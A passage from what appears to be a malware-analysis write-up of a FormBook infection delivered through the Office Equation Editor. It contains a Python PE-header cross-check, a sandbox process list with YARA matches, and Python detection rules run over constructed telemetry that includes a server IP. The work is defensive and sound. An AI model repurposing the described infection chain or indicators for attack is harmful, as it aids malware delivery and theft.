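    fields = struct.unpack_from("<IHHIIIIII", data, rva_to_offset(pe, rva))
    cb, major, minor, md_rva, md_size, flags, entry_token, res_rva, res_size = fields
    return {"cb": cb, "runtime": (major, minor), "metadata": (md_rva, md_size),
            "flags": flags, "entry_token": entry_token, "resources": (res_rva, res_size)}


def cross_check(data):
    """Tie the parsed header to the HTTP headers and dropped-file entry in the report."""
    pe = parse_pe_headers(data)
    clr = parse_clr_header(data, pe)
    size = file_size_from_sections(pe)
    return {
        "sections": [s["name"] for s in pe["sections"]],
        "size_matches_content_length": size == CONTENT_LENGTH,
        "size_matches_etag": ETAG.strip('"').split("-")[0] == f"{size:x}",
        "is_dotnet": clr is not None,
        # share of the file taken by managed resources, where .NET loaders often keep a payload
        "resource_fraction": round(clr["resources"][1] / size, 2) if clr else 0.0,
        "link_time_utc": datetime.fromtimestamp(pe["timestamp"], timezone.utc)
                                 .strftime("%Y-%m-%d %H:%M:%S"),
    }


if __name__ == "__main__":
    for key, value in cross_check(VBC_EXE_HEAD).items():
        print(f"{key}: {value}")
```

Run stand-alone it reports that the three sections end at 0x38000 = 229376 bytes, matching both the Content-Length and the first field of the ETag; that data directory 14 is populated, so the header itself says "managed assembly" independently of the report's file-type string; that the managed resource blob is 0x31310 bytes, roughly 88% of the file; and that the COFF link time 0x627e1fba is 2022-05-13 09:07:06 UTC, four seconds before the server's Last-Modified. The link time is attacker-controlled and trivially forged, so treat it as a hunting pivot, not as evidence.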



    Target ID:0
    Start time:15:14:14
    Start date:14/05/2022
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Imagebase:0x13f780000
    File size:28253536 bytes
    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:2
    Start time:15:14:38
    Start date:14/05/2022
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:4
    Start time:15:14:42
    Start date:14/05/2022
    Path:C:\Users\Public\vbc.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\Public\vbc.exe"
    Imagebase:0x300000
    File size:229376 bytes
    MD5 hash:CE42FE431B88922AB59B6FD880CADCF6
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Yara matches:
    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 41%, ReversingLabs
    Reputation:low

    Target ID:5
    Start time:15:14:44
    Start date:14/05/2022
    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Imagebase:0x1e0000
    File size:55488 bytes
    MD5 hash:6D0C232D1F4CD357FD7C14ED6FABFA90
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:moderate
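
The process list above (EXCEL.EXE, then EQNEDT32.EXE started with -Embedding, then vbc.exe from C:\Users\Public, then aspnet_compiler.exe), together with the single TCP session and the dropped-file entry for vbc.exe, is the whole chain a detection engineer has to cover. The Python below is an added example, not part of the report or of Joe Sandbox: it expresses the report's own signatures ("EQNEDT32.EXE connecting to internet", "File Dropped By EQNEDT32EXE", "Office equation editor starts processes", "Drops PE files to the user root directory") as predicates over Sysmon-style events and runs them over telemetry constructed from this report. Two fields are assumptions, because the report does not list parent processes: EQNEDT32.EXE is given svchost.exe as its parent (Equation Editor is activated through DCOM on OLE embedding, so EXCEL.EXE is not its parent, which is why the rules key on the EQNEDT32.EXE image rather than on an Office parent), and aspnet_compiler.exe is given vbc.exe as its parent. The benign Excel temp-file event is constructed as a control.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """Minimal Sysmon-style record: process start, network connect or file create."""
    kind: str            # "process", "network" or "file"
    image: str           # image path of the acting process
    parent: str = ""     # parent image (process events only)
    target: str = ""     # created file path (file) or "ip:port" (network)
    cmdline: str = ""


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"   # assumed DCOM launcher parent

# Constructed telemetry modelled on the report's process list, TCP session and
# dropped-file entry. Parents for EQNEDT32.EXE and aspnet_compiler.exe are
# assumptions (the report does not list them); the last event is a benign control.
SAMPLE_EVENTS = [
    Event("process", EXCEL, cmdline=f'"{EXCEL}" /automation -Embedding'),
    Event("process", EQNEDT, parent=SVCHOST, cmdline=f'"{EQNEDT}" -Embedding'),
    Event("network", EQNEDT, target="180.214.238.224:80"),
    Event("file", EQNEDT, target=VBC),
    Event("process", VBC, parent=EQNEDT, cmdline=f'"{VBC}"'),
    Event("process", ASPNET, parent=VBC, cmdline=ASPNET),
    Event("file", EXCEL, target=r"C:\Users\Albus\AppData\Local\Temp\~DF1A2B.TMP"),
]


def _is(image, name):
    return image.lower().endswith("\\" + name)


def _under(path, prefix):
    return path.lower().startswith(prefix.lower())


RULES = {
    # Equation Editor has no legitimate reason to open a network connection.
    "eqnedt32_network_connection":
        lambda e: e.kind == "network" and _is(e.image, "eqnedt32.exe"),
    # Any executable written by Equation Editor is the exploit's dropper stage.
    "eqnedt32_drops_executable":
        lambda e: e.kind == "file" and _is(e.image, "eqnedt32.exe")
        and e.target.lower().endswith((".exe", ".dll", ".scr", ".com")),
    # Equation Editor never needs child processes.
    "eqnedt32_spawns_process":
        lambda e: e.kind == "process" and _is(e.parent, "eqnedt32.exe"),
    # C:\Users\Public is world-writable and is where this sample lands.
    "execution_from_users_public":
        lambda e: e.kind == "process" and _under(e.image, "C:\\Users\\Public\\"),
    # A .NET Framework tool started by something outside Windows or Program Files,
    # as aspnet_compiler.exe is here right after vbc.exe.
    "dotnet_framework_tool_odd_parent":
        lambda e: e.kind == "process" and _under(e.image, "C:\\Windows\\Microsoft.NET\\")
        and bool(e.parent)
        and not (_under(e.parent, "C:\\Windows\\") or _under(e.parent, "C:\\Program Files")),
}


def evaluate(events):
    """Return (rule name, acting image) for every event that matches a rule."""
    return [(name, e.image) for e in events for name, pred in RULES.items() if pred(e)]


def triage(events, threshold=2):
    """Escalate once the chain trips more than one distinct rule on a host."""
    fired = sorted({name for name, _ in evaluate(events)})
    return {"rules_fired": fired, "escalate": len(fired) >= threshold}


if __name__ == "__main__":
    for rule, image in evaluate(SAMPLE_EVENTS):
        print(f"{rule:36} {image}")
    print(triage(SAMPLE_EVENTS))
```

Each rule stands on its own, which matters here: the first one fires at the moment of the GET, before vbc.exe exists on disk. Microsoft removed Equation Editor in the January 2018 Office updates, so on a patched estate any EQNEDT32.EXE start at all is worth an alert; the rules above are for the unpatched Office 2010 host the report was run on.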

    No disassembly